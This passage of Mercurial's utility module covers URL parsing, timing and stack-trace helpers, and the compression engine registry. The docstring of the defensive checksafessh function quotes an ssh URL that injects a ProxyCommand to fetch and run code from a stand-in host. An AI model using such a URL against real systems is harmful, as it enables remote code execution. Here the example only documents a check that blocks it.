2775 2776 # path when we store it, the path might contain '%2f' = '/',
2776 2777 # which we should *not* escape.
2777 2778 s += urlreq.quote(self.path, safe=self._safepchars)
2778 2779 if self.query:
2779 2780 # we store the query in escaped form.
2780 2781 s += '?' + self.query
2781 2782 if self.fragment is not None:
2782 2783 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2783 2784 return s
2784 2785
2785 2786 __str__ = encoding.strmethod(__bytes__)
2786 2787
2787 2788 def authinfo(self):
2788 2789 user, passwd = self.user, self.passwd
2789 2790 try:
2790 2791 self.user, self.passwd = None, None
2791 2792 s = bytes(self)
2792 2793 finally:
2793 2794 self.user, self.passwd = user, passwd
2794 2795 if not self.user:
2795 2796 return (s, None)
2796 2797 # authinfo[1] is passed to urllib2 password manager, and its
2797 2798 # URIs must not contain credentials. The host is passed in the
2798 2799 # URIs list because Python < 2.4.3 uses only that to search for
2799 2800 # a password.
2800 2801 return (s, (None, (s, self.host),
2801 2802 self.user, self.passwd or ''))
2802 2803
2803 2804 def isabs(self):
2804 2805 if self.scheme and self.scheme != 'file':
2805 2806 return True # remote URL
2806 2807 if hasdriveletter(self.path):
2807 2808 return True # absolute for our purposes - can't be joined()
2808 2809 if self.path.startswith(br'\\'):
2809 2810 return True # Windows UNC path
2810 2811 if self.path.startswith('/'):
2811 2812 return True # POSIX-style
2812 2813 return False
2813 2814
2814 2815 def localpath(self):
2815 2816 if self.scheme == 'file' or self.scheme == 'bundle':
2816 2817 path = self.path or '/'
2817 2818 # For Windows, we need to promote hosts containing drive
2818 2819 # letters to paths with drive letters.
2819 2820 if hasdriveletter(self._hostport):
2820 2821 path = self._hostport + '/' + self.path
2821 2822 elif (self.host is not None and self.path
2822 2823 and not hasdriveletter(path)):
2823 2824 path = '/' + path
2824 2825 return path
2825 2826 return self._origpath
2826 2827
2827 2828 def islocal(self):
2828 2829 '''whether localpath will return something that posixfile can open'''
2829 2830 return (not self.scheme or self.scheme == 'file'
2830 2831 or self.scheme == 'bundle')
2831 2832
2832 2833 def hasscheme(path):
2833 2834 return bool(url(path).scheme)
2834 2835
2835 2836 def hasdriveletter(path):
2836 2837 return path and path[1:2] == ':' and path[0:1].isalpha()
2837 2838
2838 2839 def urllocalpath(path):
2839 2840 return url(path, parsequery=False, parsefragment=False).localpath()
2840 2841
2841 2842 def checksafessh(path):
2842 2843 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2843 2844
2844 2845 This is a sanity check for ssh urls. ssh will parse the first item as
2845 2846 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2846 2847 Let's prevent these potentially exploited urls entirely and warn the
2847 2848 user.
2848 2849
2849 2850 Raises an error.Abort when the url is unsafe.
2850 2851 """
2851 2852 path = urlreq.unquote(path)
2852 2853 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2853 2854 raise error.Abort(_('potentially unsafe url: %r') %
2854 2855 (pycompat.bytestr(path),))
2855 2856
2856 2857 def hidepassword(u):
2857 2858 '''hide user credential in a url string'''
2858 2859 u = url(u)
2859 2860 if u.passwd:
2860 2861 u.passwd = '***'
2861 2862 return bytes(u)
2862 2863
2863 2864 def removeauth(u):
2864 2865 '''remove all authentication information from a url string'''
2865 2866 u = url(u)
2866 2867 u.user = u.passwd = None
2867 2868 return bytes(u)
2868 2869
2869 2870 timecount = unitcountfn(
2870 2871 (1, 1e3, _('%.0f s')),
2871 2872 (100, 1, _('%.1f s')),
2872 2873 (10, 1, _('%.2f s')),
2873 2874 (1, 1, _('%.3f s')),
2874 2875 (100, 0.001, _('%.1f ms')),
2875 2876 (10, 0.001, _('%.2f ms')),
2876 2877 (1, 0.001, _('%.3f ms')),
2877 2878 (100, 0.000001, _('%.1f us')),
2878 2879 (10, 0.000001, _('%.2f us')),
2879 2880 (1, 0.000001, _('%.3f us')),
2880 2881 (100, 0.000000001, _('%.1f ns')),
2881 2882 (10, 0.000000001, _('%.2f ns')),
2882 2883 (1, 0.000000001, _('%.3f ns')),
2883 2884 )
2884 2885
2885 2886 _timenesting = [0]
2886 2887
2887 2888 def timed(func):
2888 2889 '''Report the execution time of a function call to stderr.
2889 2890
2890 2891 During development, use as a decorator when you need to measure
2891 2892 the cost of a function, e.g. as follows:
2892 2893
2893 2894 @util.timed
2894 2895 def foo(a, b, c):
2895 2896 pass
2896 2897 '''
2897 2898
2898 2899 def wrapper(*args, **kwargs):
2899 2900 start = timer()
2900 2901 indent = 2
2901 2902 _timenesting[0] += indent
2902 2903 try:
2903 2904 return func(*args, **kwargs)
2904 2905 finally:
2905 2906 elapsed = timer() - start
2906 2907 _timenesting[0] -= indent
2907 2908 stderr.write('%s%s: %s\n' %
2908 2909 (' ' * _timenesting[0], func.__name__,
2909 2910 timecount(elapsed)))
2910 2911 return wrapper
2911 2912
2912 2913 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2913 2914 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2914 2915
2915 2916 def sizetoint(s):
2916 2917 '''Convert a space specifier to a byte count.
2917 2918
2918 2919 >>> sizetoint(b'30')
2919 2920 30
2920 2921 >>> sizetoint(b'2.2kb')
2921 2922 2252
2922 2923 >>> sizetoint(b'6M')
2923 2924 6291456
2924 2925 '''
2925 2926 t = s.strip().lower()
2926 2927 try:
2927 2928 for k, u in _sizeunits:
2928 2929 if t.endswith(k):
2929 2930 return int(float(t[:-len(k)]) * u)
2930 2931 return int(t)
2931 2932 except ValueError:
2932 2933 raise error.ParseError(_("couldn't parse size: %s") % s)
2933 2934
2934 2935 class hooks(object):
2935 2936 '''A collection of hook functions that can be used to extend a
2936 2937 function's behavior. Hooks are called in lexicographic order,
2937 2938 based on the names of their sources.'''
2938 2939
2939 2940 def __init__(self):
2940 2941 self._hooks = []
2941 2942
2942 2943 def add(self, source, hook):
2943 2944 self._hooks.append((source, hook))
2944 2945
2945 2946 def __call__(self, *args):
2946 2947 self._hooks.sort(key=lambda x: x[0])
2947 2948 results = []
2948 2949 for source, hook in self._hooks:
2949 2950 results.append(hook(*args))
2950 2951 return results
2951 2952
2952 2953 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2953 2954 '''Yields lines for a nicely formatted stacktrace.
2954 2955 Skips the 'skip' last entries, then return the last 'depth' entries.
2955 2956 Each file+linenumber is formatted according to fileline.
2956 2957 Each line is formatted according to line.
2957 2958 If line is None, it yields:
2958 2959 length of longest filepath+line number,
2959 2960 filepath+linenumber,
2960 2961 function
2961 2962
2962 2963 Not be used in production code but very convenient while developing.
2963 2964 '''
2964 2965 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2965 2966 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2966 2967 ][-depth:]
2967 2968 if entries:
2968 2969 fnmax = max(len(entry[0]) for entry in entries)
2969 2970 for fnln, func in entries:
2970 2971 if line is None:
2971 2972 yield (fnmax, fnln, func)
2972 2973 else:
2973 2974 yield line % (fnmax, fnln, func)
2974 2975
2975 2976 def debugstacktrace(msg='stacktrace', skip=0,
2976 2977 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2977 2978 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2978 2979 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2979 2980 By default it will flush stdout first.
2980 2981 It can be used everywhere and intentionally does not require an ui object.
2981 2982 Not be used in production code but very convenient while developing.
2982 2983 '''
2983 2984 if otherf:
2984 2985 otherf.flush()
2985 2986 f.write('%s at:\n' % msg.rstrip())
2986 2987 for line in getstackframes(skip + 1, depth=depth):
2987 2988 f.write(line)
2988 2989 f.flush()
2989 2990
2990 2991 class dirs(object):
2991 2992 '''a multiset of directory names from a dirstate or manifest'''
2992 2993
2993 2994 def __init__(self, map, skip=None):
2994 2995 self._dirs = {}
2995 2996 addpath = self.addpath
2996 2997 if safehasattr(map, 'iteritems') and skip is not None:
2997 2998 for f, s in map.iteritems():
2998 2999 if s[0] != skip:
2999 3000 addpath(f)
3000 3001 else:
3001 3002 for f in map:
3002 3003 addpath(f)
3003 3004
3004 3005 def addpath(self, path):
3005 3006 dirs = self._dirs
3006 3007 for base in finddirs(path):
3007 3008 if base in dirs:
3008 3009 dirs[base] += 1
3009 3010 return
3010 3011 dirs[base] = 1
3011 3012
3012 3013 def delpath(self, path):
3013 3014 dirs = self._dirs
3014 3015 for base in finddirs(path):
3015 3016 if dirs[base] > 1:
3016 3017 dirs[base] -= 1
3017 3018 return
3018 3019 del dirs[base]
3019 3020
3020 3021 def __iter__(self):
3021 3022 return iter(self._dirs)
3022 3023
3023 3024 def __contains__(self, d):
3024 3025 return d in self._dirs
3025 3026
3026 3027 if safehasattr(parsers, 'dirs'):
3027 3028 dirs = parsers.dirs
3028 3029
3029 3030 def finddirs(path):
3030 3031 pos = path.rfind('/')
3031 3032 while pos != -1:
3032 3033 yield path[:pos]
3033 3034 pos = path.rfind('/', 0, pos)
3034 3035
3035 3036 # compression code
3036 3037
3037 3038 SERVERROLE = 'server'
3038 3039 CLIENTROLE = 'client'
3039 3040
3040 3041 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3041 3042 (u'name', u'serverpriority',
3042 3043 u'clientpriority'))
3043 3044
3044 3045 class compressormanager(object):
3045 3046 """Holds registrations of various compression engines.
3046 3047
3047 3048 This class essentially abstracts the differences between compression
3048 3049 engines to allow new compression formats to be added easily, possibly from
3049 3050 extensions.
3050 3051
3051 3052 Compressors are registered against the global instance by calling its
3052 3053 ``register()`` method.
3053 3054 """
3054 3055 def __init__(self):
3055 3056 self._engines = {}
3056 3057 # Bundle spec human name to engine name.
3057 3058 self._bundlenames = {}
3058 3059 # Internal bundle identifier to engine name.
3059 3060 self._bundletypes = {}
3060 3061 # Revlog header to engine name.
3061 3062 self._revlogheaders = {}
3062 3063 # Wire proto identifier to engine name.
3063 3064 self._wiretypes = {}
3064 3065
3065 3066 def __getitem__(self, key):
3066 3067 return self._engines[key]
3067 3068
3068 3069 def __contains__(self, key):
3069 3070 return key in self._engines
3070 3071
3071 3072 def __iter__(self):
3072 3073 return iter(self._engines.keys())
3073 3074
3074 3075 def register(self, engine):
3075 3076 """Register a compression engine with the manager.
3076 3077
3077 3078 The argument must be a ``compressionengine`` instance.
3078 3079 """
3079 3080 if not isinstance(engine, compressionengine):
3080 3081 raise ValueError(_('argument must be a compressionengine'))
3081 3082
3082 3083 name = engine.name()
3083 3084
3084 3085 if name in self._engines:
3085 3086 raise error.Abort(_('compression engine %s already registered') %
3086 3087 name)
3087 3088
3088 3089 bundleinfo = engine.bundletype()
3089 3090 if bundleinfo:
3090 3091 bundlename, bundletype = bundleinfo
3091 3092
3092 3093 if bundlename in self._bundlenames:
3093 3094 raise error.Abort(_('bundle name %s already registered') %
3094 3095 bundlename)
3095 3096 if bundletype in self._bundletypes:
3096 3097 raise error.Abort(_('bundle type %s already registered by %s') %
3097 3098 (bundletype, self._bundletypes[bundletype]))
3098 3099
3099 3100 # No external facing name declared.
3100 3101 if bundlename:
3101 3102 self._bundlenames[bundlename] = name
3102 3103
3103 3104 self._bundletypes[bundletype] = name
3104 3105
3105 3106 wiresupport = engine.wireprotosupport()
3106 3107 if wiresupport:
3107 3108 wiretype = wiresupport.name
3108 3109 if wiretype in self._wiretypes:
3109 3110 raise error.Abort(_('wire protocol compression %s already '
3110 3111 'registered by %s') %
3111 3112 (wiretype, self._wiretypes[wiretype]))
3112 3113
3113 3114 self._wiretypes[wiretype] = name
3114 3115
3115 3116 revlogheader = engine.revlogheader()
3116 3117 if revlogheader and revlogheader in self._revlogheaders:
3117 3118 raise error.Abort(_('revlog header %s already registered by %s') %
3118 3119 (revlogheader, self._revlogheaders[revlogheader]))
3119 3120
3120 3121 if revlogheader:
3121 3122 self._revlogheaders[revlogheader] = name
3122 3123
3123 3124 self._engines[name] = engine
3124 3125
3125 3126 @property
3126 3127 def supportedbundlenames(self):
3127 3128 return set(self._bundlenames.keys())
3128 3129
3129 3130 @property
3130 3131 def supportedbundletypes(self):
3131 3132 return set(self._bundletypes.keys())
3132 3133
3133 3134 def forbundlename(self, bundlename):
3134 3135 """Obtain a compression engine registered to a bundle name.
3135 3136
3136 3137 Will raise KeyError if the bundle type isn't registered.
3137 3138
3138 3139 Will abort if the engine is known but not available.
3139 3140 """
3140 3141 engine = self._engines[self._bundlenames[bundlename]]
3141 3142 if not engine.available():
3142 3143 raise error.Abort(_('compression engine %s could not be loaded') %
3143 3144 engine.name())
3144 3145 return engine
3145 3146
3146 3147 def forbundletype(self, bundletype):
3147 3148 """Obtain a compression engine registered to a bundle type.
3148 3149
3149 3150 Will raise KeyError if the bundle type isn't registered.
3150 3151
3151 3152 Will abort if the engine is known but not available.
3152 3153 """
3153 3154 engine = self._engines[self._bundletypes[bundletype]]
3154 3155 if not engine.available():
3155 3156 raise error.Abort(_('compression engine %s could not be loaded') %
3156 3157 engine.name())
3157 3158 return engine
3158 3159
3159 3160 def supportedwireengines(self, role, onlyavailable=True):
3160 3161 """Obtain compression engines that support the wire protocol.
3161 3162
3162 3163 Returns a list of engines in prioritized order, most desired first.
3163 3164
3164 3165 If ``onlyavailable`` is set, filter out engines that can't be
3165 3166 loaded.
3166 3167 """
3167 3168 assert role in (SERVERROLE, CLIENTROLE)
3168 3169
3169 3170 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3170 3171
3171 3172 engines = [self._engines[e] for e in self._wiretypes.values()]
3172 3173 if onlyavailable:
3173 3174 engines = [e for e in engines if e.available()]
3174 3175
3175 3176 def getkey(e):
3176 3177 # Sort first by priority, highest first. In case of tie, sort
3177 3178 # alphabetically. This is arbitrary, but ensures output is
3178 3179 # stable.
3179 3180 w = e.wireprotosupport()
3180 3181 return -1 * getattr(w, attr), w.name
3181 3182
3182 3183 return list(sorted(engines, key=getkey))
3183 3184
3184 3185 def forwiretype(self, wiretype):
3185 3186 engine = self._engines[self._wiretypes[wiretype]]
3186 3187 if not engine.available():
3187 3188 raise error.Abort(_('compression engine %s could not be loaded') %
3188 3189 engine.name())
3189 3190 return engine
3190 3191
3191 3192 def forrevlogheader(self, header):
3192 3193 """Obtain a compression engine registered to a revlog header.
3193 3194
3194 3195 Will raise KeyError if the revlog header value isn't registered.
3195 3196 """
3196 3197 return self._engines[self._revlogheaders[header]]
3197 3198
3198 3199 compengines = compressormanager()
3199 3200
3200 3201 class compressionengine(object):
3201 3202 """Base class for compression engines.
3202 3203
3203 3204 Compression engines must implement the interface defined by this class.
3204 3205 """
3205 3206 def name(self):
3206 3207 """Returns the name of the compression engine.
3207 3208
3208 3209 This is the key the engine is registered under.
3209 3210
3210 3211 This method must be implemented.
3211 3212 """
3212 3213 raise NotImplementedError()
3213 3214
3214 3215 def available(self):
3215 3216 """Whether the compression engine is available.
3216 3217
3217 3218 The intent of this method is to allow optional compression engines
3218 3219 that may not be available in all installations (such as engines relying
3219 3220 on C extensions that may not be present).
3220 3221 """
3221 3222 return True
3222 3223
3223 3224 def bundletype(self):
3224 3225 """Describes bundle identifiers for this engine.
3225 3226
3226 3227 If this compression engine isn't supported for bundles, returns None.
3227 3228
3228 3229 If this engine can be used for bundles, returns a 2-tuple of strings of
3229 3230 the user-facing "bundle spec" compression name and an internal
3230 3231 identifier used to denote the compression format within bundles. To
3231 3232 exclude the name from external usage, set the first element to ``None``.
3232 3233
3233 3234 If bundle compression is supported, the class must also implement
3234 3235 ``compressstream`` and `decompressorreader``.
3235 3236
3236 3237 The docstring of this method is used in the help system to tell users
3237 3238 about this engine.
3238 3239 """
3239 3240 return None
3240 3241
3241 3242 def wireprotosupport(self):
3242 3243 """Declare support for this compression format on the wire protocol.
3243 3244
3244 3245 If this compression engine isn't supported for compressing wire
3245 3246 protocol payloads, returns None.
3246 3247
3247 3248 Otherwise, returns ``compenginewireprotosupport`` with the following
3248 3249 fields:
3249 3250
3250 3251 * String format identifier
3251 3252 * Integer priority for the server
3252 3253 * Integer priority for the client
3253 3254
3254 3255 The integer priorities are used to order the advertisement of format
3255 3256 support by server and client. The highest integer is advertised
3256 3257 first. Integers with non-positive values aren't advertised.
3257 3258
3258 3259 The priority values are somewhat arbitrary and only used for default
3259 3260 ordering. The relative order can be changed via config options.
3260 3261
3261 3262 If wire protocol compression is supported, the class must also implement
3262 3263 ``compressstream`` and ``decompressorreader``.
3263 3264 """
3264 3265 return None
3265 3266
3266 3267 def revlogheader(self):
3267 3268 """Header added to revlog chunks that identifies this engine.
3268 3269
3269 3270 If this engine can be used to compress revlogs, this method should
3270 3271 return the bytes used to identify chunks compressed with this engine.
3271 3272 Else, the method should return ``None`` to indicate it does not
3272 3273 participate in revlog compression.
3273 3274 """
3274 3275 return None
3275 3276
3276 3277 def compressstream(self, it, opts=None):
3277 3278 """Compress an iterator of chunks.
3278 3279
3279 3280 The method receives an iterator (ideally a generator) of chunks of
3280 3281 bytes to be compressed. It returns an iterator (ideally a generator)
3281 3282 of bytes of chunks representing the compressed output.
3282 3283
3283 3284 Optionally accepts an argument defining how to perform compression.
3284 3285 Each engine treats this argument differently.
3285 3286 """
3286 3287 raise NotImplementedError()
3287 3288
3288 3289 def decompressorreader(self, fh):
3289 3290 """Perform decompression on a file object.
3290 3291
3291 3292 Argument is an object with a ``read(size)`` method that returns
3292 3293 compressed data. Return value is an object with a ``read(size)`` that
3293 3294 returns uncompressed data.
3294 3295 """
3295 3296 raise NotImplementedError()
3296 3297
3297 3298 def revlogcompressor(self, opts=None):
3298 3299 """Obtain an object that can be used to compress revlog entries.
3299 3300
3300 3301 The object has a ``compress(data)`` method that compresses binary
3301 3302 data. This method returns compressed binary data or ``None`` if
3302 3303 the data could not be compressed (too small, not compressible, etc).
3303 3304 The returned data should have a header uniquely identifying this
3304 3305 compression format so decompression can be routed to this engine.
3305 3306 This header should be identified by the ``revlogheader()`` return
3306 3307 value.
3307 3308
3308 3309 The object has a ``decompress(data)`` method that decompresses
3309 3310 data. The method will only be called if ``data`` begins with
3310 3311 ``revlogheader()``. The method should return the raw, uncompressed
3311 3312 data or raise a ``RevlogError``.
3312 3313
3313 3314 The object is reusable but is not thread safe.
3314 3315 """
3315 3316 raise NotImplementedError()
3316 3317
3317 3318 class _zlibengine(compressionengine):
3318 3319 def name(self):
3319 3320 return 'zlib'
3320 3321
3321 3322 def bundletype(self):
3322 3323 """zlib compression using the DEFLATE algorithm.
3323 3324
3324 3325 All Mercurial clients should support this format. The compression
3325 3326 algorithm strikes a reasonable balance between compression ratio
3326 3327 and size.
3327 3328 """
3328 3329 return 'gzip', 'GZ'
3329 3330
3330 3331 def wireprotosupport(self):
3331 3332 return compewireprotosupport('zlib', 20, 20)
3332 3333
3333 3334 def revlogheader(self):
3334 3335 return 'x'
3335 3336
3336 3337 def compressstream(self, it, opts=None):
3337 3338 opts = opts or {}
3338 3339
3339 3340 z = zlib.compressobj(opts.get('level', -1))
3340 3341 for chunk in it:
3341 3342 data = z.compress(chunk)
3342 3343 # Not all calls to compress emit data. It is cheaper to inspect
3343 3344 # here than to feed empty chunks through generator.
3344 3345 if data:
3345 3346 yield data
3346 3347
3347 3348 yield z.flush()
3348 3349
3349 3350 def decompressorreader(self, fh):
3350 3351 def gen():
3351 3352 d = zlib.decompressobj()
3352 3353 for chunk in filechunkiter(fh):
3353 3354 while chunk:
3354 3355 # Limit output size to limit memory.
3355 3356 yield d.decompress(chunk, 2 ** 18)
3356 3357 chunk = d.unconsumed_tail
3357 3358
3358 3359 return chunkbuffer(gen())
3359 3360
3360 3361 class zlibrevlogcompressor(object):
3361 3362 def compress(self, data):
3362 3363 insize = len(data)
3363 3364 # Caller handles empty input case.
3364 3365 assert insize > 0
3365 3366
3366 3367 if insize < 44:
3367 3368 return None
3368 3369
3369 3370 elif insize <= 1000000:
3370 3371 compressed = zlib.compress(data)
3371 3372 if len(compressed) < insize:
3372 3373 return compressed
3373 3374 return None
3374 3375
3375 3376 # zlib makes an internal copy of the input buffer, doubling
3376 3377 # memory usage for large inputs. So do streaming compression
3377 3378 # on large inputs.
3378 3379 else:
3379 3380 z = zlib.compressobj()
3380 3381 parts = []
3381 3382 pos = 0
3382 3383 while pos < insize:
3383 3384 pos2 = pos + 2**20
3384 3385 parts.append(z.compress(data[pos:pos2]))
3385 3386 pos = pos2
3386 3387 parts.append(z.flush())
3387 3388
3388 3389 if sum(map(len, parts)) < insize:
3389 3390 return ''.join(parts)
3390 3391 return None
3391 3392
3392 3393 def decompress(self, data):
3393 3394 try:
3394 3395 return zlib.decompress(data)
3395 3396 except zlib.error as e:
3396 3397 raise error.RevlogError(_('revlog decompress error: %s') %
3397 3398 stringutil.forcebytestr(e))
3398 3399
3399 3400 def revlogcompressor(self, opts=None):
3400 3401 return self.zlibrevlogcompressor()
3401 3402
3402 3403 compengines.register(_zlibengine())
3403 3404
3404 3405 class _bz2engine(compressionengine):
3405 3406 def name(self):
3406 3407 return 'bz2'
3407 3408
3408 3409 def bundletype(self):
3409 3410 """An algorithm that produces smaller bundles than ``gzip``.
3410 3411
3411 3412 All Mercurial clients should support this format.
3412 3413
3413 3414 This engine will likely produce smaller bundles than ``gzip`` but
3414 3415 will be significantly slower, both during compression and
3415 3416 decompression.
3416 3417
3417 3418 If available, the ``zstd`` engine can yield similar or better
3418 3419 compression at much higher speeds.
3419 3420 """
3420 3421 return 'bzip2', 'BZ'
3421 3422
3422 3423 # We declare a protocol name but don't advertise by default because
3423 3424 # it is slow.
3424 3425 def wireprotosupport(self):
3425 3426 return compewireprotosupport('bzip2', 0, 0)
3426 3427
3427 3428 def compressstream(self, it, opts=None):
3428 3429 opts = opts or {}
3429 3430 z = bz2.BZ2Compressor(opts.get('level', 9))
3430 3431 for chunk in it:
3431 3432 data = z.compress(chunk)
3432 3433 if data:
3433 3434 yield data
3434 3435
3435 3436 yield z.flush()
3436 3437
3437 3438 def decompressorreader(self, fh):
3438 3439 def gen():
3439 3440 d = bz2.BZ2Decompressor()
3440 3441 for chunk in filechunkiter(fh):
3441 3442 yield d.decompress(chunk)
3442 3443
3443 3444 return chunkbuffer(gen())
3444 3445
3445 3446 compengines.register(_bz2engine())
3446 3447
3447 3448 class _truncatedbz2engine(compressionengine):
3448 3449 def name(self):
3449 3450 return 'bz2truncated'
3450 3451
3451 3452 def bundletype(self):
3452 3453 return None, '_truncatedBZ'
3453 3454
3454 3455 # We don't implement compressstream because it is hackily handled elsewhere.
3455 3456
3456 3457 def decompressorreader(self, fh):
3457 3458 def gen():
3458 3459 # The input stream doesn't have the 'BZ' header. So add it back.
3459 3460 d = bz2.BZ2Decompressor()
3460 3461 d.decompress('BZ')
3461 3462 for chunk in filechunkiter(fh):
3462 3463 yield d.decompress(chunk)
3463 3464
3464 3465 return chunkbuffer(gen())
3465 3466
3466 3467 compengines.register(_truncatedbz2engine())
3467 3468
3468 3469 class _noopengine(compressionengine):
3469 3470 def name(self):
3470 3471 return 'none'
3471 3472
3472 3473 def bundletype(self):
3473 3474 """No compression is performed.
3474 3475
3475 3476 Use this compression engine to explicitly disable compression.
3476 3477 """
3477 3478 return 'none', 'UN'
3478 3479
3479 3480 # Clients always support uncompressed payloads. Servers don't because
3480 3481 # unless you are on a fast network, uncompressed payloads can easily
3481 3482 # saturate your network pipe.
3482 3483 def wireprotosupport(self):
3483 3484 return compewireprotosupport('none', 0, 10)
3484 3485
3485 3486 # We don't implement revlogheader because it is handled specially
3486 3487 # in the revlog class.
3487 3488
3488 3489 def compressstream(self, it, opts=None):
3489 3490 return it
3490 3491
3491 3492 def decompressorreader(self, fh):
3492 3493 return fh
3493 3494
3494 3495 class nooprevlogcompressor(object):
3495 3496 def compress(self, data):
3496 3497 return None
3497 3498
3498 3499 def revlogcompressor(self, opts=None):
3499 3500 return self.nooprevlogcompressor()
3500 3501
3501 3502 compengines.register(_noopengine())
3502 3503
3503 3504 class _zstdengine(compressionengine):
3504 3505 def name(self):
3505 3506 return 'zstd'
3506 3507
3507 3508 @propertycache
3508 3509 def _module(self):
3509 3510 # Not all installs have the zstd module available. So defer importing
3510 3511 # until first access.
3511 3512 try:
3512 3513 from . import zstd
3513 3514 # Force delayed import.
3514 3515 zstd.__version__
3515 3516 return zstd
3516 3517 except ImportError:
3517 3518 return None
3518 3519
3519 3520 def available(self):
3520 3521 return bool(self._module)
3521 3522
3522 3523 def bundletype(self):
3523 3524 """A modern compression algorithm that is fast and highly flexible.
3524 3525
3525 3526 Only supported by Mercurial 4.1 and newer clients.
3526 3527
3527 3528 With the default settings, zstd compression is both faster and yields
3528 3529 better compression than ``gzip``. It also frequently yields better
3529 3530 compression than ``bzip2`` while operating at much higher speeds.
3530 3531
3531 3532 If this engine is available and backwards compatibility is not a
3532 3533 concern, it is likely the best available engine.
3533 3534 """
3534 3535 return 'zstd', 'ZS'
3535 3536
3536 3537 def wireprotosupport(self):
3537 3538 return compewireprotosupport('zstd', 50, 50)
3538 3539
3539 3540 def revlogheader(self):
3540 3541 return '\x28'
3541 3542
3542 3543 def compressstream(self, it, opts=None):
3543 3544 opts = opts or {}
3544 3545 # zstd level 3 is almost always significantly faster than zlib
3545 3546 # while providing no worse compression. It strikes a good balance
3546 3547 # between speed and compression.
3547 3548 level = opts.get('level', 3)
3548 3549
3549 3550 zstd = self._module
3550 3551 z = zstd.ZstdCompressor(level=level).compressobj()
3551 3552 for chunk in it:
3552 3553 data = z.compress(chunk)
3553 3554 if data:
3554 3555 yield data
3555 3556
3556 3557 yield z.flush()
3557 3558
3558 3559 def decompressorreader(self, fh):
3559 3560 zstd = self._module
3560 3561 dctx = zstd.ZstdDecompressor()
3561 3562 return chunkbuffer(dctx.read_from(fh))
3562 3563
3563 3564 class zstdrevlogcompressor(object):
3564 3565 def __init__(self, zstd, level=3):
3565 3566 # Writing the content size adds a few bytes to the output. However,
3566 3567 # it allows decompression to be more optimal since we can
3567 3568 # pre-allocate a buffer to hold the result.
3568 3569 self._cctx = zstd.ZstdCompressor(level=level,
3569 3570 write_content_size=True)
3570 3571 self._dctx = zstd.ZstdDecompressor()
3571 3572 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3572 3573 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3573 3574
3574 3575 def compress(self, data):
3575 3576 insize = len(data)
3576 3577 # Caller handles empty input case.
3577 3578 assert insize > 0
3578 3579
3579 3580 if insize < 50:
3580 3581 return None
3581 3582
3582 3583 elif insize <= 1000000:
3583 3584 compressed = self._cctx.compress(data)
3584 3585 if len(compressed) < insize:
3585 3586 return compressed
3586 3587 return None
3587 3588 else:
3588 3589 z = self._cctx.compressobj()
3589 3590 chunks = []
3590 3591 pos = 0
3591 3592 while pos < insize:
3592 3593 pos2 = pos + self._compinsize
3593 3594 chunk = z.compress(data[pos:pos2])
3594 3595 if chunk:
3595 3596 chunks.append(chunk)
3596 3597 pos = pos2
3597 3598 chunks.append(z.flush())
3598 3599
3599 3600 if sum(map(len, chunks)) < insize:
3600 3601 return ''.join(chunks)
3601 3602 return None
3602 3603
3603 3604 def decompress(self, data):
3604 3605 insize = len(data)
3605 3606
3606 3607 try:
3607 3608 # This was measured to be faster than other streaming
3608 3609 # decompressors.
3609 3610 dobj = self._dctx.decompressobj()
3610 3611 chunks = []
3611 3612 pos = 0
3612 3613 while pos < insize:
3613 3614 pos2 = pos + self._decompinsize
3614 3615 chunk = dobj.decompress(data[pos:pos2])
3615 3616 if chunk:
3616 3617 chunks.append(chunk)
3617 3618 pos = pos2
3618 3619 # Frame should be exhausted, so no finish() API.
3619 3620
3620 3621 return ''.join(chunks)
3621 3622 except Exception as e:
3622 3623 raise error.RevlogError(_('revlog decompress error: %s') %
3623 3624 stringutil.forcebytestr(e))
3624 3625
3625 3626 def revlogcompressor(self, opts=None):
3626 3627 opts = opts or {}
3627 3628 return self.zstdrevlogcompressor(self._module,
3628 3629 level=opts.get('level', 3))
3629 3630
3630 3631 compengines.register(_zstdengine())
3631 3632
3632 3633 def bundlecompressiontopics():
3633 3634 """Obtains a list of available bundle compressions for use in help."""
3634 3635 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3635 3636 items = {}
3636 3637
3637 3638 # We need to format the docstring. So use a dummy object/type to hold it
3638 3639 # rather than mutating the original.
3639 3640 class docobject(object):
3640 3641 pass
3641 3642
3642 3643 for name in compengines:
3643 3644 engine = compengines[name]
3644 3645
3645 3646 if not engine.available():
3646 3647 continue
3647 3648
3648 3649 bt = engine.bundletype()
3649 3650 if not bt or not bt[0]:
3650 3651 continue
3651 3652
3652 3653 doc = pycompat.sysstr('``%s``\n %s') % (
3653 3654 bt[0], engine.bundletype.__doc__)
3654 3655
3655 3656 value = docobject()
3656 3657 value.__doc__ = doc
3657 3658 value._origdoc = engine.bundletype.__doc__
3658 3659 value._origfunc = engine.bundletype
3659 3660
3660 3661 items[bt[0]] = value
3661 3662
3662 3663 return items
3663 3664
3664 3665 i18nfunctions = bundlecompressiontopics().values()
3665 3666
3666 3667 # convenient shortcut
3667 3668 dst = debugstacktrace
3668 3669
3669 3670 def safename(f, tag, ctx, others=None):
3670 3671 """
3671 3672 Generate a name that it is safe to rename f to in the given context.
3672 3673
3673 3674 f: filename to rename
3674 3675 tag: a string tag that will be included in the new name
3675 3676 ctx: a context, in which the new name must not exist
3676 3677 others: a set of other filenames that the new name must not be in
3677 3678
3678 3679 Returns a file name of the form oldname~tag[~number] which does not exist
3679 3680 in the provided context and is not in the set of other names.
3680 3681 """
3681 3682 if others is None:
3682 3683 others = set()
3683 3684
3684 3685 fn = '%s~%s' % (f, tag)
3685 3686 if fn not in ctx and fn not in others:
3686 3687 return fn
3687 3688 for n in itertools.count(1):
3688 3689 fn = '%s~%s~%s' % (f, tag, n)
